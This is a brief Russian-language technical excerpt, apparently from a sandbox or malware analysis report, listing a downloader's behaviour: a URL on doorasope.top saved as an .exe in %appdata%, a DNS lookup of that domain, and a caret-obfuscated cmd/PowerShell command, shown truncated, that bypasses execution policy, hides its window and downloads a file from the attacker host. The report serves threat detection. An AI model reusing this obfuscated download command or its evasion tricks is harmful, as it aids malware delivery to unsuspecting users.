Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^ErsHE^L^l^.Ex^e ^-^eXe^cut^IO^NPO^lIcy By^pa^ss ^-^nOp^Ro^f^i^l^e -w^Ind^o^wSTyl^e HIDD^EN^ (NE^W-obJecT sY^S^TEM.^n^ET.WeBc^lIe^n^t)^.^D^owN^lo^ad^FilE(^'http://www.dooraso...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pow^ErsHE^L^l^.Ex^e ^-^eXe^cut^IO^NPO^lIcy By^pa^ss ^-^nOp^Ro^f^i^l^e -w^Ind^o^wSTyl^e HIDD^EN^ (NE^W-obJecT sY^S^TEM.^n^ET.WeBc^lIe^n^t)^.^D^owN^lo^ad^FilE(^'http://www.dooraso...' (со скрытым окном)